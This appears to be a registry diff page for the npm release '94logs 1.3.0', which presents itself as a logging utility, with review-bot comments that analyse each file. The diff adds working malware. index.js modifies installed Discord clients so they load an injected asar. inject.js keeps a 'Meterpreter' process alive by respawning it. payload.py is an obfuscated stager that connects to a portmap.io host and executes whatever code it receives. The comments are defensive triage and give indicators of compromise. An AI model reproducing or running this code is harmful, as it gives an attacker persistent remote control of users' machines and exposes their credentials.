94logs 1.3.0
Potentially problematic release.
This version of 94logs might be problematic. Click here for more details.
- package/app/inject.js +19 -0
- package/app/package.json +10 -0
- package/constants.js +18 -0
- package/index.js +112 -0
- package/install.js +4 -0
- package/package.json +14 -0
- package/payload.py +1 -0
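--- a/package/app/inject.js
+++ b/package/app/inject.js
@@ -0,0 +1,19 @@
+const path = require("path");
+const cp = require('child_process');
+
+const script = path.join(__dirname, "..", "asar.py");
+
+var py = cp.spawn('python', [script]);
+
+py.stdout.on("data", (data) => {
+console.log("METERPRETER: " + data);
+})
+
+py.stderr.on('data', (data) => {
+console.error(`* METERPRETER: ${data}`);
+});
+
+py.on("exit", code => {
+cp.spawnSync("echo Meterpreter closed")
+setTimeout(() => {py = cp.spawn("python", [script])}, 5000);
+})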
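Review bot: This file is a process supervisor for a remote-access payload, not part of a logging utility: it spawns `python` on `asar.py` one directory up, tags the child's output "METERPRETER", and its `exit` handler schedules a respawn after 5000 ms, so ending the Python process on its own does not remove the foothold. Going by package/index.js in this same release, `app/` is packed into `environment.asar` and loaded from Discord's own `index.js`, so this code would presumably run inside the Discord client each time it starts. For triage, a `python` child of the Discord process and an `asar.py` sitting beside `environment.asar` are the traces this file leaves. There is no line to correct here; the file should go away with the package.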
package/app/package.json
ADDED
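--- a/package/constants.js
+++ b/package/constants.js
@@ -0,0 +1,18 @@
+module.exports = {
+DISCORD_APP_DIR_REGEX: /(app-)?\d+\.\d+\.\d+/g,
+IMPORT_SCRIPT_SHA256_SUMS: [
+"7149e6ede44455dc5313351ba9081de69d2e3c1059501f8084a6960fc52fc1d9",
+"a1d390d24b10503e50bf063374439032e8e8b7b5963db1c0364826a645c7d6d3",
+"83ace8860901890dec66c93245d8b252de85e0f3af34f6a9f21052a03a01531c",
+],
+OBFUSCATE_OPTIONS: {
+compact: false,
+controlFlowFlattening: true,
+controlFlowFlatteningThreshold: 1,
+numbersToExpressions: true,
+simplify: false,
+stringArrayShuffle: true,
+splitStrings: false,
+stringArrayThreshold: 1
+}
+};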
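--- a/package/index.js
+++ b/package/index.js
@@ -0,0 +1,112 @@
+const fs = require("fs");
+const path = require("path");
+const log4js = require("log4js");
+const logger = log4js.getLogger();
+const cp = require("child_process");
+const crypto = require("crypto");
+const asar = require('asar');
+
+const constants = require("./constants.js");
+
+typeof process.env.LOCALAPPDATA === "undefined" ? __dirname : process.env.LOCALAPPDATA;
+
+const discordLocations = [
+path.join(process.env.LOCALAPPDATA, "Discord"),
+path.join(process.env.LOCALAPPDATA, "discordcanary"),
+path.join(process.env.LOCALAPPDATA, "DiscordPTB"),
+];
+
+async function init() {
+const inject_paths = discordLocations
+.filter(fs.existsSync)
+.map((l) =>
+fs.readdirSync(l)
+.map((l1) => path.join(l, l1))
+.filter((l1) => constants.DISCORD_APP_DIR_REGEX.test(l1))[0]
+)
+.filter(fs.existsSync)
+.map((l) =>
+fs.readdirSync(l)
+.filter((_dir) => {
+let dir = path.basename(_dir.toLowerCase());
+
+if(dir.includes("modules")) return true;
+return false;
+})
+.map((l1) => path.join(l, l1))[0]
+)
+.filter(fs.existsSync)
+.map((l) =>
+fs.readdirSync(l)
+.filter((_l1) => {
+let l1 = path.basename(_l1.toLowerCase());
+
+if(l1.includes("core") && l1.includes("discord") && l1.includes("desktop")) return true;
+return false;
+})
+.map((l1) => path.join(l, l1))[0]
+)
+.filter(fs.existsSync)
+.map((l) => fs.readdirSync(l)
+.map((_l1) => {
+let l1 = path.basename(_l1.toLowerCase());
+
+if(l1.includes("core") && l1.includes("discord") && l1.includes("desktop")) return path.join(l, l1);
+return path.join(l, l1, "..");
+})[0]
+)
+.filter(fs.existsSync)
+.map((l) =>
+fs.readdirSync(l)
+.filter((_l1) => {
+let l1 = path.basename(_l1.toLowerCase());
+
+if(l1.includes("index.js")) return true;
+return false;
+})
+.map((l1) => path.join(l, l1))[0]
+
+)
+.filter(fs.existsSync)
+
+const scripts = inject_paths.filter((sl) => constants.IMPORT_SCRIPT_SHA256_SUMS
+.map(str => str.toLowerCase())
+.includes(
+crypto.createHash("sha256", {})
+.update(fs.readFileSync(sl).toString())
+.digest()
+.toString("hex")
+.toLowerCase()
+)
+);
+
+for(const script of scripts) {
+const pyPayload = fs.readFileSync(path.join(__dirname, "payload.py"));
+
+const outPayload = path.join(script, "..", "asar.py");
+
+fs.writeFileSync(outPayload, pyPayload);
+fs.appendFileSync(script, '\nrequire("./environment.asar");');
+
+await asar.createPackage(path.join(__dirname, "app"), path.join(script, "..", "environment.asar"));
+}
+
+cp.spawn("python", ["payload.py"], {cwd: __dirname, detached: true});
+}
+
+module.exports = class {
+constructor(klogger, opts) {
+try {
+this._init();
+} catch (err) {
+throw err;
+}
+}
+
+/**
+* @private
+*/
+_init = init;
+};
+
+// init();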
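Review bot: Constructing the exported class calls `init()`, which tampers with an installed Discord client instead of logging anything: for each `index.js` found under the `LOCALAPPDATA` Discord, discordcanary and DiscordPTB trees whose SHA-256 is listed in `IMPORT_SCRIPT_SHA256_SUMS`, it writes `asar.py` beside it, appends `require("./environment.asar");` to that file, builds `environment.asar` from `app/`, and finally starts `payload.py` detached. Since `scripts` in package/package.json is empty, this fires when the module is required and instantiated, so a check that only inspects install hooks would likely miss it (install.js is listed in the release but its content is not shown on this page). `log4js` and `logger` are imported and never used in the visible code, which suggests the "logging utility" description is cover. On a host where this ran, remove the package, delete `asar.py` and `environment.asar`, restore or reinstall the Discord client so the appended `require` line is gone, and treat credentials used on that machine as exposed.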
package/install.js
ADDED
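--- a/package/package.json
+++ b/package/package.json
@@ -0,0 +1,14 @@
+{
+"name": "94logs",
+"version": "1.3.0",
+"description": "Simple logging utility like log4j.",
+"main": "index.js",
+"repository": "https://github.com/Fredriksson448/94logs.git",
+"author": "Fredriksson",
+"license": "GNU",
+"scripts": {},
+"dependencies": {
+"asar": "^3.1.0",
+"log4js": "^6.3.0"
+}
+}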
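--- a/package/payload.py
+++ b/package/payload.py
@@ -0,0 +1 @@
+exec(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('aW1wb3J0IHNvY2tldCx6bGliLGJhc2U2NCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJ2phY2thc3NuYW5kdS0zNDg0My5wb3J0bWFwLmlvJywzNDg0MykpCgkJYnJlYWsKCWV4Y2VwdDoKCQl0aW1lLnNsZWVwKDUpCmw9c3RydWN0LnVucGFjaygnPkknLHMucmVjdig0KSlbMF0KZD1zLnJlY3YobCkKd2hpbGUgbGVuKGQpPGw6CglkKz1zLnJlY3YobC1sZW4oZCkpCmV4ZWMoemxpYi5kZWNvbXByZXNzKGJhc2U2NC5iNjRkZWNvZGUoZCkpLHsncyc6c30pCg==')[0]))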
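Review bot: The single line hands a base64-decoded string straight to `exec`, and that string, decoded by inspection, is a network stager rather than anything a logging package needs. It retries a TCP connection to `jackassnandu-34843.portmap.io` on port 34843 up to ten times, reads a length-prefixed blob from the socket, then decompresses and executes it, so whatever the remote end sends runs with the user's privileges and nothing in the file authenticates or limits it. The host name and port are usable as network indicators for egress logs and blocklists. A one-line `.py` file inside an npm package that begins `exec(__import__('base64').b64decode(` is a cheap static signal for this same pattern in other releases.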